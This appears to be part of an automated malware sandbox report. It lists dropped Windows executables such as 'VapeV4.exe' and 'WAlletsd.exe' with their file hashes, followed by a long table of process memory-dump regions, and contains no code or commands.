SHA512b20b2960249c9e0104156daaa214ca2455bff03106081d85eee6f98962ce1e08d80198174ac8ca4e5afa1260b1cacdb7f895f453af20b9b4fd7230f91bcacb51
-
C:\Users\Admin\AppData\Roaming\VapeV4.exeFilesize
35.9MB
MD5ba485001338d6de9fa22f48b35d5ae3f
SHA1463827aa0747220e3580aa7253188ab5c820e2c2
SHA256b544f8c440fdec72dee17093cb1bba576ca9508928e807017cbba30a14c54722
SHA51229675e1b5084fbce792d20260121e6d9284c0cc5005f83b111fb9104f050a86d274c215fdeb9cfd928464c3949b3842741c8ff7831970749fb03ef9591e084aa
-
C:\Users\Admin\AppData\Roaming\WAlletsd.exeFilesize
9.6MB
MD58d36f5e077cdae092a45078d84897031
SHA132b94790f988c031ac06db18fd9bf9e90c6d9a2e
SHA256164bff0c7dfda91f8fb38b8d77e90de002678adaeb17419f48366097fcd8d54e
SHA51283b0f60134b6598e52ecad8540f0d316d3a2b300b3ade0968c5bdef782ed134300bec991e4280692cf7c89e40ac93a802b234113bc5c991dd8436c1caa1d0545
-
C:\Users\Admin\AppData\Roaming\discord.exeFilesize
90KB
MD54aac4a3a51dc946c49fe38f142539308
SHA14e7e7e993e092d8ad0fbe4852ccb116abda8b3a0
SHA256a69841a608fc2a280d501c4e42ae6c6ce7a2cd5bd0db480dcce9df89a78f739e
SHA51280b72a86aea8e0583d336cdbf50ce883053b624d8bb7ee4db2224625ebddd9a5acc32ac03976891eff56dd1e62151d41fbfe7b594110b0601f2db05c2f8a1d59
-
C:\Users\Admin\Downloads\Unconfirmed 235853.crdownloadFilesize
36.0MB
MD5feb087808958828564c3f63115056652
SHA1aa7da658d1720bb04c4f48bd48c96c2b203007b6
SHA2567db2f1b8447c7724e0b312fb2a9cc177807d72d44cec68e12aef49b3990b1c29
SHA51282e2ee2059895539b7407f5f16cd8dc278cfa334e7774e819544e0f5cd00002910a1dfd745a89c6a22dd683d04fe2ac45f82587fdb11d1efddb1c6bff2855ea5
-
\??\pipe\LOCAL\crashpad_3512_SQDFBPEUMAVQGYWGMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/668-718-0x00007FF792020000-0x00007FF7929B6000-memory.dmpFilesize
9.6MB
-
memory/668-710-0x00007FF792020000-0x00007FF7929B6000-memory.dmpFilesize
9.6MB
-
memory/668-638-0x00007FF792020000-0x00007FF7929B6000-memory.dmpFilesize
9.6MB
-
memory/1124-200-0x00000000008C0000-0x0000000002CB0000-memory.dmpFilesize
35.9MB
-
memory/1124-216-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/1124-198-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/2316-311-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/2316-219-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/2316-220-0x0000021E37080000-0x0000021E37090000-memory.dmpFilesize
64KB
-
memory/2316-221-0x0000021E37080000-0x0000021E37090000-memory.dmpFilesize
64KB
-
memory/2316-231-0x0000021E4F800000-0x0000021E4F822000-memory.dmpFilesize
136KB
-
memory/2764-550-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/2764-551-0x000001989D990000-0x000001989D9A0000-memory.dmpFilesize
64KB
-
memory/2832-432-0x000002B3F7E60000-0x000002B3F7E70000-memory.dmpFilesize
64KB
-
memory/2832-414-0x000002B3F7E60000-0x000002B3F7E70000-memory.dmpFilesize
64KB
-
memory/2832-435-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/3584-400-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/3584-412-0x000001882CF70000-0x000001882CF80000-memory.dmpFilesize
64KB
-
memory/3584-401-0x000001882CF70000-0x000001882CF80000-memory.dmpFilesize
64KB
-
memory/3584-589-0x000001882CF70000-0x000001882CF80000-memory.dmpFilesize
64KB
-
memory/3652-382-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/3652-379-0x0000020D1FAE0000-0x0000020D1FAF0000-memory.dmpFilesize
64KB
-
memory/3652-402-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/4556-202-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/4556-362-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/4916-499-0x00000274212D0000-0x00000274212E0000-memory.dmpFilesize
64KB
-
memory/4916-498-0x00000274212D0000-0x00000274212E0000-memory.dmpFilesize
64KB
-
memory/4916-497-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/4944-548-0x0000019E62C70000-0x0000019E62C80000-memory.dmpFilesize
64KB
-
memory/4944-549-0x0000019E62C70000-0x0000019E62C80000-memory.dmpFilesize
64KB
-
memory/4944-547-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/5292-413-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/5372-346-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/5372-217-0x0000000000D70000-0x000000000314A000-memory.dmpFilesize
35.9MB
-
memory/5372-215-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/5452-539-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/5452-345-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/5452-344-0x0000000000970000-0x000000000098E000-memory.dmpFilesize
120KB
-
memory/5608-383-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/5608-184-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/5608-185-0x0000000000B80000-0x0000000000B98000-memory.dmpFilesize
96KB
-
memory/5728-171-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/5728-172-0x00000000004E0000-0x00000000028E6000-memory.dmpFilesize
36.0MB
-
memory/5728-199-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/5828-561-0x00007FFAF13D0000-0x00007FFAF1403000-memory.dmpFilesize
204KB
-
memory/5828-363-0x00007FFAF1870000-0x00007FFAF189D000-memory.dmpFilesize
180KB
-
memory/5828-380-0x00007FFAF1410000-0x00007FFAF1429000-memory.dmpFilesize
100KB
-
memory/5828-546-0x00007FFADECF0000-0x00007FFADF210000-memory.dmpFilesize
5.1MB
-
memory/5828-381-0x00007FFB06150000-0x00007FFB0615D000-memory.dmpFilesize
52KB
-
memory/5828-378-0x00007FFAF1300000-0x00007FFAF13CD000-memory.dmpFilesize
820KB
-
memory/5828-376-0x00007FFADECF0000-0x00007FFADF210000-memory.dmpFilesize
5.1MB
-
memory/5828-320-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmpFilesize
5.9MB
-
memory/5828-374-0x00007FFAF15B0000-0x00007FFAF15D3000-memory.dmpFilesize
140KB
-
memory/5828-375-0x00007FFAF13D0000-0x00007FFAF1403000-memory.dmpFilesize
204KB
-
memory/5828-385-0x00007FFB05FD0000-0x00007FFB05FDD000-memory.dmpFilesize
52KB
-
memory/5828-398-0x00007FFAEEC40000-0x00007FFAEED5C000-memory.dmpFilesize
1.1MB
-
memory/5828-338-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmpFilesize
140KB
-
memory/5828-562-0x00007FFAF1300000-0x00007FFAF13CD000-memory.dmpFilesize
820KB
-
memory/5828-360-0x00007FFAF1430000-0x00007FFAF15A7000-memory.dmpFilesize
1.5MB
-
memory/5828-342-0x00007FFB06160000-0x00007FFB0616F000-memory.dmpFilesize
60KB
-
memory/5828-853-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmpFilesize
140KB
-
memory/5828-858-0x00007FFAF1430000-0x00007FFAF15A7000-memory.dmpFilesize
1.5MB
-
memory/5828-366-0x00007FFAF1850000-0x00007FFAF1869000-memory.dmpFilesize
100KB
-
memory/5828-610-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmpFilesize
5.9MB
-
memory/5828-852-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmpFilesize
5.9MB
-
memory/5828-484-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmpFilesize
140KB
-
memory/5828-637-0x00007FFAEEC40000-0x00007FFAEED5C000-memory.dmpFilesize
1.1MB
-
memory/5828-695-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmpFilesize
5.9MB
-
memory/5828-434-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmpFilesize
5.9MB
-
memory/5828-384-0x00007FFAF12C0000-0x00007FFAF12D4000-memory.dmpFilesize
80KB
-
memory/6196-867-0x00007FF6B2640000-0x00007FF6B2FD6000-memory.dmpFilesize
9.6MB
-
memory/6196-907-0x00007FF6B2640000-0x00007FF6B2FD6000-memory.dmpFilesize
9.6MB
-
memory/6464-588-0x000001783EA20000-0x000001783EA30000-memory.dmpFilesize
64KB
-
memory/6464-587-0x000001783EA20000-0x000001783EA30000-memory.dmpFilesize
64KB
-
memory/6464-577-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmpFilesize
10.8MB
-
memory/6920-629-0x000002BC89830000-0x000002BC89831000-memory.dmpFilesize
4KB
-
memory/7120-908-0x00000000011A0000-0x00000000011C0000-memory.dmpFilesize
128KB